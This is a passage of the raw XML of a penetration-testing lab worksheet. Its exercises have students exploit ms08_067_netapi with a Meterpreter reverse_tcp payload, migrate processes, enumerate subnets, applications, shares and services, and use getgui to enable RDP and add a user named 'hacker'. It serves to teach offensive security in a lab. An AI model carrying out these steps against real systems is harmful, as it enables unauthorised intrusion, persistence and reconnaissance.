          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7F2055CD" wp14:editId="1688A764">
            <wp:extent cx="6400800" cy="1485900"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="127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400800" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC244F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C99B0AF" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1BF613"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 xml:space="preserve">DIY #1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>How can you display information about the SMBDomain module option?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC2234" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3278DC90" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B25894" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">DIY #2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>How can you check the evasion techniques for this module? And how many are there?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FCFE8F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BE70CB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9E21A" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part #3 – Using Meterpreter for Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A63EECB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In this part of the lab we will be using the Metasploit’s Meterpreter as our payload to ease our post-exploitation phase of the attack. As you know the Metasploit’s Meterpreter has a huge number of post exploitation modules that we can benefit from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC923B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7112828D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Use the same exploit module we used previously “ms08_067_netapi” but this time configure the exploit module to use the windows Meterpreter “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E274000" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CF25AD"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#3.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> show how you configured this payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE54A6C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A64CC5A" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38007E99"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#3.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the reason that the Metasploit module didn’t configure the LHOST option automatically for you? (if it did please skip but ask your instructor in class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06058EA0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3D37D7" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D93F0EC" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8E61F5"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#3.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Let’s assume you configured this exploit module to use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>windows/meterpreter/bind_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” payload instead of the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>”. What will be the difference in the LPORT option for both payloads?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450ADC6" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1627607F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAD9A43"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#3.4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure the payload properly and then use the command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” to start the action. After that use the command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” to get a list of available commands. Run the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command, what is the result? Also what are the results of the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203EA09" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592D4A04" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397D603B"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#3.5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command to list all the processes running on the target. How can we migrate to a more reliable process?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E19D0A" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12993BAC" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B92F1F4"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#3.6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suppose you want to check the subnets around you, this can be done using the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>get_local_subnets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” or the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>post/multi/manage/autoroute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” post-exploitation module. How will you run it? And what subnets did you find?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58E784" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9390D0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04274DB0"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#3.7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>get_application_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” or the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>post/windows/gather/enum_applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” post-exploitation module. What information will this module provide? And why do you think it’s useful?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC0F68" w14:textId="7B468924" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C08288E" w14:textId="77777777" w:rsidR="009B112F" w:rsidRDefault="009B112F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DB19E1"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DIY #3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>getgui</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">” post exploitation module to successfully enable RDP, and add a new user with the name hacker and a password also hacker. Show how you did this (hint: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
          </w:rPr>
          <w:t>READ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>)? Login to the system and show a screenshot of your system using a RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA71A7"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lastRenderedPageBreak/>
        <w:t>Deliverable #3.8:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> After successfully compromising a target; how can you know if the target is a virtual machine or not?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16C9B0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644463B7" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB24A35"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#3.9:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> We need to gather information about shared folders; we can use the "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>enum_shares</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” module. What answers did you get? At the same time we need to get more information about the running services on the system; we can use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>enum_services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” module. What information did this module provide you with? Where did the module store the results (please check them)? What about the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D5AE38" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08896174" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>Before you attempt DIY #4, exit from the meterpreter command prompt and exploit the system again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196C6115" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD5101C"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DIY #4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Load the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>espia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
